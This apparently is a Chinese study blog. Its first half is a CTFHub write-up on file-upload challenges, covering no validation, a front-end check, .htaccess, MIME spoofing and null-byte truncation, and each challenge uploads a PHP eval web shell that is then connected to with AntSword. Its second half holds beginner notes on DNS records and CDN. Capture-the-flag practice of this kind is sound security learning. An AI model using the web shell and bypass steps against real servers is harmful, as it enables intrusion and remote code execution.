# 文件上传

## 无验证

### 题目：

![](images/无验证.png)



![](images/Snipaste_2025-02-08_14-48-26.png)

### 解题

使用工具：蚁剑

创建一个名为ctf.php的文件，写入

```php
<?php @eval($_POST["ctf"]);?>
```

将文件上传

![](images/上传.png)

打开蚁剑

![](images/意见-1.png)

测试连接，显示连接成功

![](images/列表.png)

![](images/f.png)

## 前端验证

### 题目：

![](images/timu1.png)

![](images/题目.png)

### 解题

工具：蚁剑、burp

![](images/yuanma.png)

查看网页源码发现只能上传jpg、png、gif格式的文件

创建一个名为ctf.jpg的文件，写入

```php
<?php @eval($_POST["ctf"]);?>
```

将文件上传，上传成功

![](images/成功.png)

打开burp,找到记录

![](images/1.png)

放入重放器中

![](images/2.png)

找到上传的文件，将文件的后缀改为php,并重新发送

![](images/4.png)

看一下页面渲染，成功上传了

打开蚁剑连接

![](images/意见.png)

![](images/意见1.png)

![](images/意见3.png)

![](images/f-1.png)

## .htaccess

### 题目：

![](images/timu2.png)

![](images/timu.png)

### 解题

查看源码发现有一堆不能上传的文件后缀

![](images/yuanma-1.png)

题目中有提示，上网搜了下htaccess

> .htaccess文件(或者"[分布式](https://so.csdn.net/so/search?q=%E5%88%86%E5%B8%83%E5%BC%8F\&spm=1001.2101.3001.7020)配置文件"）,全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法， 即，在一个特定的文档目录中放置一个包含一个或多个指令的文件， 以作用于此目录及其所有子目录。
>

创建一个er.txt的文件，写入

```php
<?php @eval($_POST["ctf"]);?>

```

创建一个.htaccess的文件，写入

```php
AddType application/x-httpd-php .txt
```

作用：服务器会将所有扩展名为 **`.txt`** 的文件当&#x4F5C;**&#x20;PHP 脚本进行处理**

将文件上传上去，接着使用蚁剑连接

![](images/lianjien.png)

![](images/1-1.png)

![](images/2-1.png)

### 吐槽

当开始以为.htaccess是个文件后缀，需要有文件名，于是建了个cc.htaccess的文件上传上去，结果怎么都连接不上，折腾了半小时，后来才发现.htaccess就是个文件

## MIME绕过

### 题目：

![](images/tm.png)

![](images/tm2.png)

### 解题

MIME？先搜一下

> MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种[扩展名](https://baike.baidu.com/item/%E6%89%A9%E5%B1%95%E5%90%8D/103577?fromModule=lemma_inlink)的[文件](https://baike.baidu.com/item/%E6%96%87%E4%BB%B6/6270998?fromModule=lemma_inlink)用一种[应用程序](https://baike.baidu.com/item/%E5%BA%94%E7%94%A8%E7%A8%8B%E5%BA%8F/5985445?fromModule=lemma_inlink)来打开的方式类型，当该[扩展名](https://baike.baidu.com/item/%E6%89%A9%E5%B1%95%E5%90%8D/103577?fromModule=lemma_inlink)文件被访问的时候，[浏览器](https://baike.baidu.com/item/%E6%B5%8F%E8%A7%88%E5%99%A8/213911?fromModule=lemma_inlink)会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名，以及一些媒体文件打开方式。
>
> ——百度

没大看懂。。。

> **MIME 类型**
>
> MIME (Multipurpose Internet Mail Extensions) 是描述消息内容类型的标准，用来表示文档、文件或字节流的性质和格式。
>
> MIME 消息能包含文本、图像、音频、视频以及其他应用程序专用的数据。
>
> 浏览器通常使用 MIME 类型（而不是文件扩展名）来确定如何处理URL，因此 We b服务器在响应头中添加正确的 MIME 类型非常重要。如果配置不正确，浏览器可能会无法解析文件内容，网站将无法正常工作，并且下载的文件也会被错误处理。
>
> ——菜鸟教程

好像是用来判断文件类型的

看一下源码

![](images/源码.png)

上传一个一句话试一下

![](images/err.png)

将这次的提交放入burp的重放器中

![](images/cf.png)

看一下菜鸟

> **语法**
>
> MIME 类型通用结构：
>
> type/subtype
>
> MIME 的组成结构非常简单，由类型与子类型两个字符串中间用 **/** 分隔而组成，不允许有空格。type 表示可以被分多个子类的独立类别，subtype 表示细分后的每个类型。
>
> MIME类型对大小写不敏感，但是传统写法都是小写。
>
> 两种主要的 MIME 类型在默认类型中扮演了重要的角色：
>
> * **text/plain** 表示文本文件的默认值。
>
> * **application/octet-stream** 表示所有其他情况的默认值。

将application/octet-stream改为text/plain试一下

。。。还是失败，换成image/png试一下

![](images/cggg.png)

成功了，接着就是蚁剑连接

![](images/1-2.png)

![](images/2-2.png)

![](images/Snipaste_2025-02-08_16-46-00.png)

![](images/f-2.png)

## 00截断

### 题目：

![](images/tm-1.png)

![](images/tm1.png)

### 解题

搜一下00截断

> 00截断是操作系统层的漏洞，由于操作系统是C语言或汇编语言编写的，这两种语言在定义字符串时，都是以\0（即0x00）作为字符串的结尾。操作系统在识别字符串时，当读取到\0字符时，就认为读取到了一个字符串的结束符号。因此，我们可以通过修改数据包，插入\0字符的方式，达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制。

看一下源码

![](images/yunma.png)

创建一个名为ww.php.jpg的文件，写入

```php
<?php @eval($_POST["ctf"]);?>
```

上传

![](images/sc1.png)

使用burp，放入重放器中

![](images/2-3.png)

修改，并重新发送

![](images/1-3.png)

打开http://challenge-736e7c823c9e93f3.sandbox.ctfhub.com:10800/upload/ww.php验证一下，没有报错，成功了，接着就是蚁剑获取flag

![](images/f-3.png)

# 网页

买了个域名，当开始啥都不懂，整理了以下内容

## DNS

**什么是DNS？**

DNS （Domain Name System 的缩写）的作用非常简单，就是根据域名查出IP地址。你可以把它想象成一本巨大的电话本。举例来说，如果你要访问域名[qlsf.online](http://qlsf.online)，首先要通过DNS查出它的IP地址是`141.101.129.69`。

## **主机记录是什么？**

> 主机记录就是域名前缀，常见用法有：
>
> * www：解析后的域名为 [www.qlsf.online](http://qlsf.online)
>
> * @：直接解析主域名 [qlsf.online](http://qlsf.online)
>
> * ：泛解析，匹配其他所有域名 [\*.qlsf.online](http://qlsf.online)

## **什么是记录类型？**

> * A记录：地址记录，用来指定域名的IPv4地址（如：8.8.8.8），如果需要将域名指向一个IP地址，就需要添加A记录。
>
> * CNAME： 如果需要将域名指向另一个域名，再由另一个域名提供ip地址，就需要添加CNAME记录。
>
> * NS：域名[服务器](https://cloud.tencent.com/product/cvm/?from_column=20065\&from=20065)记录，如果需要把子域名交给其他DNS服务商解析，就需要添加NS记录。
>
> * AAA：用来指定主机名（或域名）对应的IPv6地址（例如：ff06:0:0:0:0:0:0:c3）记录。
>
> * MX：如果需要设置邮箱，让邮箱能收到邮件，就需要添加MX记录。

## **为什么？？？**

我将我的github上的建的网页用CNAME的方式关联起来，发现访问变快了，不用科学也能打开了，为啥？？？

DNS解析是将域名与ip地址关联起来，怎么访问就变快了，上网找到了这种解释，不知道对不对

> 我们会发现，github偶尔可以打开，偶尔打不开，能不能打开似乎全靠运气，其实这都是因为你访问github官网时是直接访问域名即github.com，那么中间有个域名通过DNS解析的过程，将域名解析为对应的ip地址，其实主要时间都是花在了DNS解析上，导致了github有时候能打开，有时候打不开，有时候访问很慢。

但访问一次后，本地的DNS解析服务器不应该保存了github的ip了吗，应该变快了呀，为啥还那么慢（不开科学的情况下），为什么？？？



## CDN

### 定义

> CND在网络技术中通常指的是**内容分发网络**（Content Delivery Network），它是一种分布式网络，旨在通过在多个地理位置部署服务器来优化数据的传输速度和可靠性。CND的核心功能是加速静态资源的加载，例如网站上的图片、媒体文件以及JavaScript和CSS等文件。这是通过在不同地区设置服务器节点来实现的，当用户访问网站时，他们会从最近的节点获取资源，从而减少了数据传输的延迟和提高了加载速度。
>
> CDN的全称是Content Delivery Network，即内容分发网络。
>
> CND加速主要是加速静态资源，如网站上面上传的图片、媒体，以及引入的一些Js、css等文件。
>
> CND加速需要依靠各个网络节点，例如100台CDN服务器分布在全国范围，从上海访问，会从最近的节点返回资源，这是核心。
>
> CND服务器通过缓存或者主动抓取主服务器的内容来实现资源储备。
>
>

### CDN和DNS的区别是什么？

**平时我们的用户在访问未使用CDN的网站时路径过程为下：**

1、用户在浏览器输入想要访问的域名；

2、浏览器向本地DNS查询该域名IP地址；

3、本地DNS向13根发起请求；

4、[根服务器](https://zhida.zhihu.com/search?content_id=455730973\&content_type=Answer\&match_order=1\&q=%E6%A0%B9%E6%9C%8D%E5%8A%A1%E5%99%A8\&zhida_source=entity)在向本地服务器返回一级服务器；

5、一级服务器所授权的权威DNS返回给本地DNS，权威DNS服务器将IP地址作为解析结果送给本地DNS解析服务器；

6、本地[DNS解析服务器](https://zhida.zhihu.com/search?content_id=455730973\&content_type=Answer\&match_order=2\&q=DNS%E8%A7%A3%E6%9E%90%E6%9C%8D%E5%8A%A1%E5%99%A8\&zhida_source=entity)将得到的IP地址发回给用户，从而完成解析过程。

**而在我们使用了[CDN缓存](https://zhida.zhihu.com/search?content_id=455730973\&content_type=Answer\&match_order=1\&q=CDN%E7%BC%93%E5%AD%98\&zhida_source=entity)后访问网站过程则变为：**

1、与上述相同；

2、浏览器调用[域名解析](https://zhida.zhihu.com/search?content_id=455730973\&content_type=Answer\&match_order=1\&q=%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90\&zhida_source=entity)库对域名进行解析，由于CDN对域名解析过程进行了调整，所以解析函数库一般得到的是该域名对应的CNAME记录，就是我们称之为的别名，为了得到真正的IP地址，浏览器会再次对获得的CNAME域名进行解析以获得真实IP地址；在此过程中，使用全局负载均衡DNS解析，如根据地理位置信息解析对应的IP地址，使得用户能就近访问网站；

3、此次解析得到的CDN[缓存服务器](https://zhida.zhihu.com/search?content_id=455730973\&content_type=Answer\&match_order=1\&q=%E7%BC%93%E5%AD%98%E6%9C%8D%E5%8A%A1%E5%99%A8\&zhida_source=entity)的IP地址，浏览器在得到实际IP地址后，想缓存服务器发出访问请求；

4、缓存服务器根据浏览器提供的域名，通常Cache内部专用的DNS解析得到此域名的实际IP地址，再向实际IP地址提交访问请求；

5、缓存服务器从实际IP地址得到内容以后，一方面在本地保存，以备后续使用，二方面把获取的数据返还给客户端，完成数据服务过程；

6、客户端得到有缓存服务器返回的数据以后显示出来并完成浏览的数据请求过程。

